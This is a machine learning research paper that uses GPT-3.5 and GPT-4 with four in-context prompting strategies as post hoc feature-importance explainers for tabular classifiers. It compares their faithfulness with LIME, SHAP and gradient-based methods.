Over the past decade, machine learning (ML) models have become ubiquitous across various industries and applications. With their increasing use in critical applications (e.g., healthcare, financial systems, and crime forecasting), it becomes essential to ensure that ML developers and practitioners understand and trust their decisions. To this end, several approaches (Ribeiro et al., 2016; 2018; Smilkov et al., 2017; Sundararajan et al., 2017; Lundberg & Lee, 2017; Shrikumar et al., 2017) have been proposed in the explainable artificial intelligence (XAI) literature to generate explanations for understanding model predictions. However, these explanation methods are highly sensitive to changes in their hyperparameters (Yeh et al., 2019; Bansal et al., 2020), require access to the underlying black-box ML model (Lundberg & Lee, 2017; Ribeiro et al., 2016), and/or are often computationally expensive (Situ et al., 2021), thus impeding reproducibility and the trust of relevant stakeholders.

More recently, generative models such as Large Language Models (LLMs) (Radford et al., 2017) have steered ML research in new directions and shown exceptional capabilities, allowing them to surpass state-of-the-art models at complex tasks like machine translation (Hendy et al., 2023), language understanding (Brown et al., 2020), commonsense reasoning (Wei et al., 2022b; Krishna et al., 2023), and coding tasks (Bubeck et al., 2023). However, there is very little work on systematically analyzing the reliability of LLMs as explanation methods.
While recent research has used LLMs to explain what patterns in a text cause a neuron to activate, such approaches simply explain correlations between the network input and specific neurons and do not explain what causes model behavior at a mechanistic level (Bills et al., 2023). Thus, the ability of LLMs to act as reliable explainers and improve the understanding of ML models lacks sufficient exploration.

Figure 1: Overview of our framework. Given a dataset and model to explain, we provide 1) different prompting strategies to generate explanations using LLMs, 2) functions to parse LLM-based explanations, 3) utility functions to support new LLMs, and 4) diverse performance metrics to evaluate the faithfulness of explanations.

Present work. In this work, we present the first framework to study the effectiveness of LLMs in explaining other predictive models (see Fig. 1). More specifically, we introduce four broad prompting strategies — Perturbation-based ICL, Prediction-based ICL, Instruction-based ICL, and Explanation-based ICL — for generating post hoc explanations using LLMs. Our first three strategies entail providing local neighborhood samples and labels of a given instance whose prediction we want to explain, before asking an LLM to identify features that are key drivers of the model's predictions. In our last approach, we leverage the in-context learning (ICL) (Liu et al., 2023b) behavior of LLMs by providing a small set of instances and their corresponding explanations (output by state-of-the-art post hoc explanation methods) as input to an LLM and asking it to generate feature importance-based explanations for new samples. We also explore different prompting and design choices, such as increasing the level of information in each prompt, to generate more faithful explanations using LLMs.

We conduct extensive experimentation with four benchmark datasets, two black-box models, and two GPT models to analyze the efficacy of our proposed framework. Our empirical studies reveal the following key findings. 1) LLMs, on average, accurately identify the most important feature (top-k=1) with 72.19% accuracy across different datasets, with performance dropping for larger values of top-k. 2) LLMs can mimic the behavior of six state-of-the-art post hoc explanation methods using the proposed Explanation-based ICL prompting strategy and only four ICL samples. On average, LLMs behave as post hoc explainers by providing explanations that are on par with existing methods, such as LIME and gradient-based methods, in terms of their faithfulness. 3) LLMs struggle to retrieve relevant information from longer prompts, resulting in a decrease in the faithfulness of the explanations generated using a large set of ICL samples. 4) Our proposed framework paves the way for a new paradigm in XAI research, where LLMs can aid in explaining black-box model predictions.

2 RELATED WORKS

Our work lies at the intersection of post hoc explanations, large language models, and in-context learning, which we discuss below.

Post Hoc Explanations. The task of understanding model predictions has become increasingly intricate with the growing popularity of complex ML models (Doshi-Velez & Kim, 2017) due to their inherent black-box nature, which makes it difficult to interpret their internal reasoning. To this end, a plethora of feature attribution methods (commonly referred to as post hoc explanation methods) have been proposed to provide explanations for these models' predictions.
These explanations are predominantly presented in the form of feature attributions, which highlight the importance of each input feature on the model's prediction. Broadly, post hoc explainers can be divided into perturbation-based and gradient-based methods. While perturbation-based methods (Ribeiro et al., 2016; Lundberg & Lee, 2017; Zeiler & Fergus, 2014) leverage perturbations of the given instance to construct an interpretable approximation of the black-box model behavior, gradient-based methods (Smilkov et al., 2017; Sundararajan et al., 2017) leverage gradients w.r.t. the given instance to explain model predictions. In this work, we primarily focus on state-of-the-art local post hoc explainers, i.e., methods explaining individual feature importance for model predictions of individual instances.

**Large Language Models.** LLMs have seen exponential growth in recent years, both in terms of their size and the complexity of tasks they can perform (Radford et al., 2017). Recent advances in LLMs like GPT-4 (OpenAI), Bard (Google), Claude-2 (Anthropic), and Llama-2 (Meta) are changing the paradigm of NLP research and have led to their widespread use across applications spanning machine translation (Vaswani et al., 2017), question-answering (Brown et al., 2020), text generation (Radford et al., 2017), and medical data records (Lee et al., 2020; Alsentzer et al., 2019). In this work, we, for the first time, explore the use of LLMs in explaining other predictive models.

**In-context Learning.** While their high performance and generalization capabilities have led to highly effective language models for numerous tasks (Wei et al., 2022a), they have also increased the models' parameter sizes and the computational costs of additional fine-tuning on new downstream tasks. To alleviate this, recent works have introduced **in-context learning (ICL)**, which allows an LLM to perform well on new tasks by simply using a few task samples in the prompt (Liu et al., 2023b). Despite its effectiveness in enhancing the performance of LLMs, ICL has not been thoroughly explored for its potential to generate post hoc explanations. In this work, we investigate the utility of LLMs in generating post hoc explanations by leveraging their in-context learning abilities.

### 3 Our Framework

Next, we describe our framework, which aims to generate explanations using LLMs. To achieve this goal, we outline four distinct prompting strategies — **Perturbation-based ICL (Sec. 3.1), Prediction-based ICL (Sec. 3.2), Instruction-based ICL (Sec. 3.3),** and **Explanation-based ICL (Sec. 3.4).**

**Notation.** Let \( f : \mathbb{R}^d \rightarrow [0, 1] \) denote a black-box ML model that takes an input \( x \in \mathbb{R}^d \) and returns the probability of \( x \) belonging to a class \( c \in C \), along with the predicted label \( y \). Following previous XAI works (Ribeiro et al., 2016; Smilkov et al., 2017), we randomly sample points from the local neighborhood \( N_x \) of the given input \( x \) to generate explanations, where \( N_x = N(x, \sigma^2) \) denotes the neighborhood of perturbations around \( x \), generated using a Normal distribution with mean 0 and variance \( \sigma^2 \).

#### 3.1 Perturbation-based ICL

In the Perturbation-based ICL prompting strategy, we use an LLM to explain \( f \), trained on tabular data, by querying the LLM to identify the top-\( k \) most important features in determining the output of \( f \) in a rank-ordered manner. A minimal sketch of the neighborhood sampling and serialization used throughout this section is shown below.
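This is an illustrative Python sketch — not the authors' implementation — assuming NumPy and a six-feature dataset with features named 'A'–'F'; the value of σ, the random seed, and the helper names are our own choices for illustration.

```python
import numpy as np

def sample_neighborhood(x, n_icl, sigma=0.1, seed=0):
    """Draw n_icl perturbed samples from N_x = N(x, sigma^2)."""
    rng = np.random.default_rng(seed)
    return x + rng.normal(0.0, sigma, size=(n_icl, x.shape[0]))

def serialize(x_prime, label, names="ABCDEF"):
    """Render one perturbed sample and its label in the ICL prompt format."""
    feats = ", ".join(f"{n} = {v:.3f}" for n, v in zip(names, x_prime))
    return f"Input: {feats}\nOutput: {label}"

# Usage: label each perturbation with the black-box model f, then join the
# serialized strings to form the "Dataset" portion of the prompt, e.g.:
# icl_block = "\n".join(serialize(xp, int(f(xp) > 0.5))
#                       for xp in sample_neighborhood(x, n_icl=16))
```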
To tackle this, we sample input-output pairs from the neighborhood \( N_x \) of \( x \) and generate their respective strings following a serialization template; for instance, a perturbed sample's feature vector \( x' = [0.058, 0.632, -0.015, 1.012, -0.022, -0.108] \), belonging to class 0 in the COMPAS dataset, is converted into a natural-language string as:

```
# Serialization template
Input: A = 0.058, B = 0.632, C = -0.015, D = 1.012, E = -0.022, F = -0.108
Output: 0
```

While previous post hoc explainers suggest using a large number of neighborhood samples (Ribeiro et al., 2016; Smilkov et al., 2017), it is impractical to provide all samples from \( N_x \) in the prompt for an LLM due to the constraint on the maximum context length and performance loss when given more information (Liu et al., 2023a). Consequently, we select \( n_{ICL} \) samples from \( N_x \) to use in the LLM's prompt. In the interest of maintaining a neutral and fundamental approach, we employ two primary sampling strategies, both selecting balanced class representation within the neighborhoods defined by \( N_x \). The first strategy selects samples randomly, while the second chooses those with the highest confidence levels, aiding the LLM in generating explanations centered on model certainty.

Given \( n_{ICL} \) input-output pairs from \( N_x \) and the test sample \( x \) to be explained, we add context with respect to the predictive model, dataset, and task description in our prompt to aid the LLM in behaving like a post hoc explanation method. Motivated by the local neighborhood approximation works in XAI, the Perturbation-based ICL prompting strategy presumes that the local behavior of \( f \) is a simple linear decision boundary, contrasting with the often globally exhibited complex non-linear decision boundary. Hence, assuming a sufficient number of perturbations in \( N_x \), the LLM is expected to accurately approximate the black-box model's behavior and utilize this information to identify the top-\( k \) most important features. The final prompt structure is given below, where the "Context" provides the LLM with the background of the underlying ML model, the number of features in the dataset, and model predictions, "Dataset" denotes the \( n_{ICL} \) instances sampled from the neighborhood \( N_x \) of \( x \), "Question" is the task we want our LLM to perform, and "Instructions" are the guidelines we want the LLM to follow while generating the output explanations.

3.2 Prediction-based ICL

Here, we devise Prediction-based ICL, a strategy closer to the traditional ICL prompting style, where the primary objective remains the same — understanding the workings of the black-box model $f$ by identifying the top-$k$ most important features. This strategy positions the LLM to first emulate the role of the black-box model by making predictions, staging it to extract the important features that influenced its decision. We follow the perturbation strategy of Sec. 3.1 and construct the Prediction-based ICL prompt using $n_{ICL}$ input-output pairs from $N_x$. The main difference in the Prediction-based ICL prompting strategy lies in the structuring of the prompt, which is described below:

# Prediction-based ICL Prompt Template
**Context:** "We have a two-class machine learning model that predicts based on 6 features: ['A', 'B', 'C', 'D', 'E', 'F'].
#### 3.2 Prediction-based ICL

Here, we devise Prediction-based ICL, a strategy closer to the traditional ICL prompting style, where the primary objective remains the same — understanding the workings of the black-box model \( f \) by identifying the top-\( k \) most important features. This strategy positions the LLM to first emulate the role of the black-box model by making predictions, staging it to extract the important features that influenced its decision. We follow the perturbation strategy of Sec. 3.1 and construct the Prediction-based ICL prompt using \( n_{ICL} \) input-output pairs from \( N_x \). The main difference in the Prediction-based ICL prompting strategy lies in the structuring of the prompt, which is described below:

# Prediction-based ICL Prompt Template

**Context:** “We have a two-class machine learning model that predicts based on 6 features: ['A', 'B', 'C', 'D', 'E', 'F']. The model has been trained on a dataset and has made the following predictions.”

**Dataset:**
Input: A = -0.158, B = 0.293, C = 0.248, D = 1.130, E = 0.013, F = -0.038
Output: 0
Input: A = 0.427, B = 0.016, C = -0.128, D = 0.949, E = 0.035, F = -0.045
Output: 1

**Question:** “Based on the model’s predictions and the given dataset, estimate the output for the final input. What appears to be the top five most important features in determining the model’s prediction?”

**Instructions:** “Think about the question. After explaining your reasoning, provide your answer as the top five most important features ranked from most important to least important, in descending order. Only provide the feature names on the last line. Do not provide any further details on the last line.”

Here, we construct the prompt using the task description followed by the \( n_{ICL} \) ICL samples, and then ask the LLM to provide the predicted label for the test sample \( x \) and explain how it generated that label. The primary motivation behind the Prediction-based ICL prompting strategy is to investigate whether the LLM can learn the classification task from the ICL set and, if successful, identify the important features in the process. This approach aligns more closely with the traditional ICL prompting style, offering a different perspective on the problem.

#### 3.3 Instruction-based ICL

Instruction-based prompting transitions from specifying task objectives to providing detailed guidance on the strategy for task execution. Rather than solely instructing the LLM on what the task entails, this strategy delineates how to conduct the given task. The objective remains to understand the workings of the black-box model and identify the top-\( k \) most important features. However, by using step-by-step directives, we aim to induce a more structured and consistent analytical process within the LLM, targeting more faithful explanations. The final prompt structure is as follows:

# Instruction-based ICL Prompt Template

**Context:** “We are analyzing a fixed set of perturbations around a specific input to understand the influence of each feature on the model’s output. The dataset below contains the change in features ‘A’ through ‘F’ (with negative values denoting a decrease in a feature’s value) and the corresponding outputs.”

**Dataset:**
- Change in Input: A: -0.217, B: 0.240, C: 0.114, D: 0.007, E: 0.091, F: 0.025
- Change in Output: -1
...
- Change in Input: A: 0.185, B: -0.185, C: -0.232, D: -0.130, E: -0.020, F: 0.015
- Change in Output: 0

**Instructions:** “For each feature, starting with ‘A’ and continuing to ‘F’:
1. Analyze the feature in question:
   a. Compare instances where its changes are positive to where its changes are negative and explain how this difference correlates with the change in output.
   b. Rate the importance of the feature in determining the output on a scale of 0-100, considering both positive and negative correlations. Ensure to give equal emphasis to both positive and negative correlations and avoid focusing only on absolute values.
2. After analyzing the feature, position it in a running rank compared to the features already analyzed. For instance, after analyzing feature ‘B’, determine its relative importance compared to ‘A’ and position it accordingly in the rank (e.g., BA or AB). Continue this process until all features from ‘A’ to ‘F’ are ranked.
Upon completion of all analyses, provide the final rank of features from ‘A’ to ‘F’ on the last line. Avoid providing general methodologies or suggesting tools. Justify your findings as you go.”
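The per-feature analysis that these instructions request is loosely analogous to the following reference computation (a sketch under our own formulation; the LLM performs this reasoning in natural language, and the scoring below is illustrative, not part of the prompt):

```python
import numpy as np

def rank_features_by_correlation(dx, dy):
    """Correlate each feature's change with the change in output, score it,
    and build a final rank, mirroring steps 1-2 of the instructions.

    dx: (n, d) array of changes in input; dy: (n,) array of changes in output.
    """
    rank = []
    for j in range(dx.shape[1]):
        # Pearson correlation between feature-j changes and output changes;
        # taking |r| weighs positive and negative correlations equally.
        r = np.corrcoef(dx[:, j], dy)[0, 1]
        rank.append((abs(r), chr(ord("A") + j)))
    # Rank from most to least important, e.g. "DACBEF".
    return "".join(name for _, name in sorted(rank, reverse=True))
```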
Here, we provide general instructions to the LLM for understanding the notion of important features and how to identify them through the lens of correlation analysis. To achieve this, we instruct the LLM to analyze each feature sequentially and to ensure that both positive and negative correlations are equally emphasized. The LLM assigns an importance score to each feature in the given dataset and then positions it in a running rank. This rank is necessary to differentiate features and avoid ties in the LLM's evaluations. The final line ensures that the LLM's responses are strictly analytical, minimizing non-responsiveness or digressions into tool or methodology recommendations.

#### 3.4 Explanation-based ICL

Recent studies show that LLMs can learn new tasks through ICL, enabling them to excel at new downstream tasks by merely observing a few instances of the task in the prompt. In the Explanation-based ICL prompting strategy, we leverage the ICL capability of LLMs to alleviate the computational complexity of some post hoc explanation methods. In particular, we investigate whether an LLM can mimic the behavior of a post hoc explainer by looking at a few input, output, and explanation examples. We generate explanations for a given test sample \( x \) by utilizing the ICL framework and supplying \( n_{ICL} \) input, output, and explanation examples to the LLM, where the explanations can be generated using any post hoc explanation method. For constructing the ICL set, we randomly select \( n_{ICL} \) input instances \( X_{ICL} \) from the ICL split of the dataset and generate their predicted labels \( y_{ICL} \) using the model \( f \). Next, we generate explanations \( E_{ICL} \) for the samples \((X_{ICL}, y_{ICL})\) using any post hoc explainer. Using the above input, output, and explanation samples, we construct a prompt by concatenating each triple as follows:

# Explanation-based ICL Prompt Template

Input: A = 0.172, B = 0.000, C = 0.000, D = 1.000, E = 0.000, F = 0.000
Output: 1
Explanation: A,C,B,F,D,E
...
Input: A = 0.052, B = 0.053, C = 0.073, D = 0.000, E = 0.000, F = 1.000
Output: 0
Explanation: A,B,C,E,F,D

Input: A = 0.180, B = 0.222, C = 0.002, D = 0.000, E = 0.000, F = 1.000
Output: 0
Explanation:

Using the Explanation-based ICL prompting strategy, we aim to investigate the learning capability of LLMs, i.e., whether they can generate faithful explanations by examining \( n_{ICL} \) demonstration triples of inputs, outputs, and explanations generated by a state-of-the-art post hoc explainer.
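As a concrete illustration of this construction, the sketch below assembles the demonstration triples and the final query; the argument and helper names are ours, and the explanations \( E_{ICL} \) can come from any post hoc explainer such as LIME or SHAP:

```python
def build_explanation_icl_prompt(X_icl, y_icl, E_icl, x_test, y_test, names):
    """Concatenate (input, output, explanation) demonstrations and append
    the test sample with an empty 'Explanation:' slot for the LLM to fill.

    E_icl holds rank-ordered feature lists (e.g. "A,C,B,F,D,E") produced by
    any post hoc explainer; all argument names here are illustrative.
    """
    def serialize(x, y):
        feats = ", ".join(f"{n} = {v:.3f}" for n, v in zip(names, x))
        return f"Input: {feats}\nOutput: {y}"

    demos = [serialize(x, y) + f"\nExplanation: {e}"
             for x, y, e in zip(X_icl, y_icl, E_icl)]
    query = serialize(x_test, y_test) + "\nExplanation:"
    return "\n\n".join(demos + [query])
```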
### 4 Experiments

Next, we evaluate the effectiveness of LLMs as post hoc explainers. More specifically, our experimental analysis focuses on the following questions: Q1) Can LLMs generate faithful post hoc explanations? Q2) Do LLM-augmented post hoc explainers achieve similar faithfulness vs. their vanilla counterparts? Q3) Are LLMs better than state-of-the-art post hoc explainers at identifying the most important feature? Q4) Is GPT-4 a better explainer than GPT-3.5? Q5) Are changes to the LLM's prompting strategy necessary for generating faithful explanations?

#### 4.1 Datasets and Experimental Setup

We first describe the datasets and models used to study the reliability of LLMs as post hoc explainers and then outline the experimental setup.

**Datasets.** Following previous LLM works (Hegselmann et al., 2023), we perform our analysis on four real-world tabular datasets: Blood (Yeh et al., 2009) with four features, Recidivism (ProPublica) with six features, Adult (Kaggle) with 13 features, and Default Credit (UCI) with 10 features. The datasets come with a random train-test split, and we further subdivide the train set, allocating 80% for training and the remaining 20% for ICL sample selection, as detailed in Sec. 3.4. We use a random set of 100 samples from the test split to generate explanations for all of our experiments.

**Predictive Models.** We consider two ML models of varying complexity in our experiments: i) Logistic Regression (LR) and ii) Artificial Neural Networks (ANN). We use PyTorch (Paszke et al., 2019) to implement the models with the following combination of hidden layers: one layer of size 16 for the LR model; and three layers of size 64, 32, and 16 for the ANN, using ReLU for the hidden layers and softmax for the output (see Table 1 for the predictive performances of these models).

**Large Language Model.** We consider GPT-3.5 and GPT-4 as the language models for all experiments.

**Baseline Explanation Methods.** We use six post hoc explainers as baselines to investigate the effectiveness of explanations generated using LLMs: LIME (Ribeiro et al., 2016), SHAP (Lundberg & Lee, 2017), Vanilla Gradients (Zeiler & Fergus, 2014), SmoothGrad (Smilkov et al., 2017), Integrated Gradients (Sundararajan et al., 2017), and Gradient x Input (ITG) (Shrikumar et al., 2017).

**Performance Metrics.** We employ four distinct metrics to measure the faithfulness of an explanation. To quantify faithfulness when there exists a ground-truth top-\(k\) explanation for each test input (i.e., the LR model coefficients), we use the Feature Agreement (FA) and Rank Agreement (RA) metrics introduced in Krishna et al. (2022), which compare the LLM's top-\(k\) directly with the model's ground truth. The FA and RA metrics range over \([0, 1]\), where 0 means no agreement and 1 means full agreement. However, in the absence of a top-\(k\) ground-truth explanation (as is the case with ANNs), we use the Prediction Gap on Important feature perturbation (PGI) and the Prediction Gap on Unimportant feature perturbation (PGU) metrics from OpenXAI (Agarwal et al., 2022). While PGI measures the change in prediction probability that results from perturbing the features deemed influential, PGU examines the impact of perturbing unimportant features. Here, the perturbations are generated using Gaussian noise \( N(0, \sigma^2) \).

**Implementation Details.** To generate perturbations for each ICL prompt, we use a neighborhood size of \( \sigma = 0.1 \) and generate a local perturbation neighborhood \( \mathcal{N}_x \) for each test sample \( x \). We sample \( n_x = 10{,}000 \) points for each neighborhood, where the values of \( \sigma \) and \( n_x \) were chosen to give an equal number of samples for each class whenever possible. We present perturbations in two main formats: as the raw perturbed inputs alongside their corresponding outputs (shown in the Sec. 3.1 and 3.2 templates), or as the change between each perturbed input and the test sample together with the corresponding change in output (shown in Sec. 3.3). The second approach significantly aids the LLM in discerning the most important features (see Fig. 1), providing only the changes relative to the test sample and bypassing the LLM's need to internally compute these differences. As a result, the constant value of the original test point becomes irrelevant, and this clearer, relational view allows the LLM to focus directly on variations in input and output.
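A minimal sketch of this second, relative format is given below (same assumed `model` interface and helper names as in the earlier sketch; for a classifier, the change in output is the difference of predicted labels):

```python
import numpy as np

def serialize_deltas(model, x, sigma=0.1, n_icl=16, seed=0):
    """Serialize perturbations as 'Change in Input / Change in Output' pairs
    relative to the test sample x, as in the Sec. 3.3 template."""
    rng = np.random.default_rng(seed)
    names = [chr(ord("A") + i) for i in range(len(x))]
    y0 = int(model.predict(x.reshape(1, -1))[0])  # label of the test sample
    lines = []
    for _ in range(n_icl):
        dx = rng.normal(0.0, sigma, size=len(x))
        y = int(model.predict((x + dx).reshape(1, -1))[0])
        feats = ", ".join(f"{n}: {d:.3f}" for n, d in zip(names, dx))
        lines.append(f"Change in Input: {feats}\nChange in Output: {y - y0}")
    return "\n".join(lines)
```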
Note that both of these formats are absent from Sec. 3.4, which uses test samples directly and does not compute perturbations. For the LLMs, we use OpenAI's text generation API with a temperature of \( \tau = 0 \) for our main experiments. To evaluate the LLM explanations, we extract and process the answers to identify the top-\(k\) most important features. We first save each LLM query's reply to a text file and use a script to extract the features. We added explicit instructions like “... provide your answer as a feature name on the last line. Do not provide any further details on the last line.” to ensure reliable parsing of the LLM outputs. In rare cases, the LLM does not follow our requested response format, or it replies with “I don't have enough information to determine the most important features.” See Appendix 6.1 for further details.

#### 4.2 Results

Next, we discuss experimental results that answer the key questions highlighted at the beginning of this section about LLMs as post hoc explainers (Q1-Q5).

**1) LLMs can generate faithful explanations.** We compare our proposed prompting-based LLM explanation strategies to existing post hoc explainers on the task of identifying important features for understanding ANN (Fig. 2) and LR (Fig. 3) model predictions across four real-world datasets (see Table 2). For the ANN model, the LLM-based explanations perform on par with the gradient-based methods (despite the latter having white-box access to the underlying black-box model) and LIME (which approximates model behavior using a surrogate linear model). In particular, our proposed prompting strategies perform better than ITG, SHAP, a Random baseline, and a 16-sample version of LIME, namely LIME$_{16}$, which is analogous to the number of ICL samples used in the LLM prompts. We observe that LLM explanations, on average, achieve 51.74% lower PGU and 163.40% higher PGI than ITG, SHAP, and the Random baseline on the larger datasets (with more features), Adult and Credit, compared to 25.56% lower PGU and 22.86% higher PGI on the Blood and Recidivism datasets. While our prompting strategies achieve competitive PGU and PGI scores among themselves across different datasets for ANN models, the Instruction-based ICL strategy, on average across datasets, achieves higher FA and RA scores for the LR model (Fig. 3). We find that gradient-based methods and LIME achieve almost perfect scores on the FA and RA metrics, as they are able to obtain accurate model gradients and approximate the model behavior with high precision. Interestingly, the LLM-based explanations perform better than the ITG, SHAP, and Random baseline methods, even for a linear model.

Figure 2: PGU and PGI scores of explanations generated using post hoc methods and LLMs (Instruction-based, Prediction-based, and Perturbation-based ICL prompting strategies) for an ANN model. On average, across four datasets, we find that LLM-based explanations perform on par with gradient-based and LIME methods and outperform the LIME$_{16}$, ITG, and SHAP methods.

Figure 3: FA and RA scores of explanations generated using post hoc methods and LLMs (Instruction-based, Prediction-based, and Perturbation-based ICL prompting strategies) for an LR model.
On average, across four datasets, we find that gradient-based methods and the LIME method (with 1000 samples) outperform all other methods, and that Instruction-based ICL explanations outperform the other two prompting strategies across all datasets.

**2) LLM-augmented explainers achieve similar faithfulness to their vanilla counterparts.** We evaluate the faithfulness of the explanations generated using the Explanation-based ICL prompting strategy. Our results show that LLMs generate explanations whose faithfulness is on par with that of explanations generated using state-of-the-art post hoc explanation methods, for both LR and larger ANN predictive models, across all four datasets (Fig. 4; see Table 3 for complete results) and all four evaluation metrics. We demonstrate that very few in-context examples (here, \( n_{ICL} = 4 \)) are sufficient for the LLM to mimic the behavior of any post hoc explainer and generate faithful explanations, suggesting the effectiveness of LLMs as an explanation method. Interestingly, for low-performing explanation methods like ITG and SHAP, we find that explanations generated using their LLM counterparts achieve higher feature and rank agreement scores (Fig. 4) in the case of LR models, hinting that LLMs can use their internal knowledge to improve the faithfulness of explanations.

Figure 4: Faithfulness metrics on the Recidivism dataset for six post hoc explainers and their LLM-augmented counterparts for a given LR (left) and ANN (right) model. LLM-augmented explanations achieve on-par performance w.r.t. post hoc methods across all four metrics (see Table 3 for complete results on all other datasets).

**3) LLMs accurately identify the most important feature.** To demonstrate the LLM's capability in identifying the most important feature, we show the faithfulness performance of the generated explanations across four datasets. Our results in Fig. 5 demonstrate the impact of different top-\(k\) values on the faithfulness of explanations generated using our prompting strategies. We observe a steady decrease in RA scores (0.722 for top-\(k\)=1 vs. 0.446 for top-\(k\)=2 vs. 0.376 for top-\(k\)=4) across three datasets (Blood, Credit, and Adult) as the top-\(k\) value increases. Interestingly, the RA value for top-\(k\)=1 on the Recidivism dataset is almost zero, though this can be attributed to the LLM's handling of the two primary features, whose LR coefficients have nearly identical magnitudes; the LLM generally places them both within the top two but, due to their similar importance, defaults to alphabetical order. However, when employing our Instruction-based ICL running-rank strategy, we find that the RA value rises from 0 to 0.5, highlighting the influence of nuanced prompts on the LLM's ranking mechanism. Further, we observe that LLMs, on average across four datasets and three prompting strategies, faithfully identify the top-\(k\)=1 feature with a 72.19% FA score (see Fig. 12), and their faithfulness performance takes a hit for higher top-\(k\) values. For context, the baseline methods' performances in identifying the top-\(k\)=1 feature are as follows: Random baseline (15%), SHAP (29.75%), ITG (29.5%), and LIME/IG/SG/Grad (100%) (see Tables 3-5).

Figure 5: Effect of the top-\(k\) value on the RA metric using the Perturbation-based, Prediction-based, and Instruction-based ICL prompting strategies. Shown are the results for three prompting strategies and four datasets using the LR model. On average, LLMs achieve high scores in identifying the most important feature (top-\(k\)=1), and the performance decreases as we increase the top-\(k\) value (see Fig. 12 for results on FA).
**4) GPT-3.5 vs. GPT-4.** An interesting question is how the reasoning capability of an LLM affects the faithfulness of the generated explanations. Hence, we compare the output explanations from the GPT-3.5 and GPT-4 models for understanding black-box model predictions. The results in Fig. 6 show that explanations generated using GPT-4, on average across four datasets, achieve higher faithfulness scores than explanations generated using the GPT-3.5 model. Across the four prompting strategies, GPT-4, on average, obtains 4.53% higher FA and 48.01% higher RA scores than GPT-3.5 on explanations generated for the Adult dataset. We attribute this increase in performance to GPT-4's superior reasoning capabilities compared to the GPT-3.5 model (OpenAI, 2023). In Fig. 6, we find that Instruction-based ICL, on average across four datasets, outperforms the Perturbation-based ICL and Prediction-based ICL strategies on the RA metric. Further, our results in Fig. 8 show that the faithfulness performance of GPT-4 and GPT-3.5 is on par when evaluated using our Explanation-based ICL strategy, which highlights that both models are capable of emulating the behavior of a post hoc explainer by looking at a few input, output, and explanation examples.

Figure 6: RA faithfulness metric of explanations generated using the Perturbation-based ICL, Prediction-based ICL, and Instruction-based ICL prompting strategies on four real-world datasets. Explanations from GPT-4, on average, achieve higher RA scores than their GPT-3.5 counterparts (see Figures 8 and 9 for similar plots on the Feature Agreement metric and the Explanation-based ICL strategy).

**5) Ablation Study.** We conduct ablations on several components of the prompting strategies, namely the number of ICL samples, the perturbation format, and the temperature values. The results show that our choice of hyperparameter values is important for the prompting techniques to generate faithful post hoc explanations (Figs. 7, 10). Our ablation on the number of ICL samples (Fig. 7) shows that neither too few nor too many ICL samples are beneficial for LLMs when generating post hoc explanations. While too few ICL samples provide insufficient information for the LLM to approximate the predictive behavior of the underlying ML model, a large number of ICL samples increases the input context, and the LLM struggles to retrieve relevant information from longer prompts, resulting in a decrease in the faithfulness of the explanations it generates. In contrast to LIME, the faithfulness of LLM explanations deteriorates upon increasing the number of ICL samples (analogous to the neighborhood of a given test sample). Across all four prompting strategies, we observe a drop in FA, RA, and PGI scores as we increase the number of ICL samples to 64. Further, our ablation on the temperature parameter of the LLMs shows that the faithfulness of the explanations does not change much across different temperature values (see Appendix Fig. 10). Finally, the results in Fig. 11 show that our prompting strategies achieve higher faithfulness when using the difference between the perturbed and test samples as input in the ICL samples.
Figure 7: FA, RA, and PGI performance of LIME and all four proposed prompting strategies as we increase the number of ICL samples (analogous to neighborhood samples in LIME) for the LR model trained on the Adult dataset. In contrast to LIME, the faithfulness of LLM explanations across different metrics decreases for a higher number of ICL samples, likely due to the limited capability of LLMs to handle longer prompts.

### 5 Conclusion

We introduce and explore the potential of using state-of-the-art LLMs as post hoc explainers. To this end, we propose four prompting strategies — Perturbation-based ICL, Prediction-based ICL, Instruction-based ICL, and Explanation-based ICL — with varying levels of information about the local neighborhood of a test sample, to generate explanations for black-box model predictions using LLMs. We conducted several experiments to evaluate LLM-generated explanations using four benchmark datasets. Our results across different prompting strategies highlight that LLMs can generate faithful explanations and consistently outperform methods like ITG and SHAP. Our work paves the way for several exciting future directions in explainable artificial intelligence (XAI) that explore LLM-based explanation frameworks.

REFERENCES

Chirag Agarwal, Satyapriya Krishna, Eshika Saxena, Martin Pawelczyk, Nari Johnson, Isha Puri, Marinka Zitnik, and Himabindu Lakkaraju. OpenXAI: Towards a transparent evaluation of model explanations. NeurIPS, 2022.

Emily Alsentzer, John R Murphy, Willie Boag, Wei-Hung Weng, Di Jin, Tristan Naumann, and Matthew McDermott. Publicly available clinical BERT embeddings. arXiv, 2019.

Anthropic. Claude 2. https://www.anthropic.com/index/claude-2 (Accessed on 07/17/2023).

Naman Bansal, Chirag Agarwal, and Anh Nguyen. SAM: The sensitivity of attribution methods to hyperparameters. In CVPR, 2020.

Steven Bills, Nick Cammarata, Dan Mossing, Henk Tillman, Leo Gao, Gabriel Goh, Ilya Sutskever, Jan Leike, Jeff Wu, and William Saunders. Language models can explain neurons in language models. https://openaipublic.blob.core.windows.net/neuron-explainer/paper/index.html, 2023.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. NeurIPS, 2020.

Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, et al. Sparks of artificial general intelligence: Early experiments with GPT-4. arXiv, 2023.

Finale Doshi-Velez and Been Kim. Towards a rigorous science of interpretable machine learning. arXiv, 2017.

Google. Try Bard, an AI experiment by Google. https://bard.google.com/ (Accessed on 07/17/2023).

Stefan Hegselmann, Alejandro Buendia, Hunter Lang, Monica Agrawal, Xiaoyi Jiang, and David Sontag. TabLLM: Few-shot classification of tabular data with large language models. In AISTATS. PMLR, 2023.

Amr Hendy, Mohamed Abdelrehim, Amr Sharaf, Vikas Raunak, Mohamed Gabr, Hitokazu Matsushita, Young Jin Kim, Mohamed Afify, and Hany Hassan Awadalla. How good are GPT models at machine translation? A comprehensive evaluation. arXiv, 2023.

Kaggle. Adult income dataset. https://www.kaggle.com/wenruliu/adult-income-dataset. Accessed: 2020-01-01.

Satyapriya Krishna, Tessa Han, Alex Gu, Javin Pomba, Shahin Jabbari, Steven Wu, and Himabindu Lakkaraju. The disagreement problem in explainable machine learning: A practitioner's perspective. arXiv, 2022.
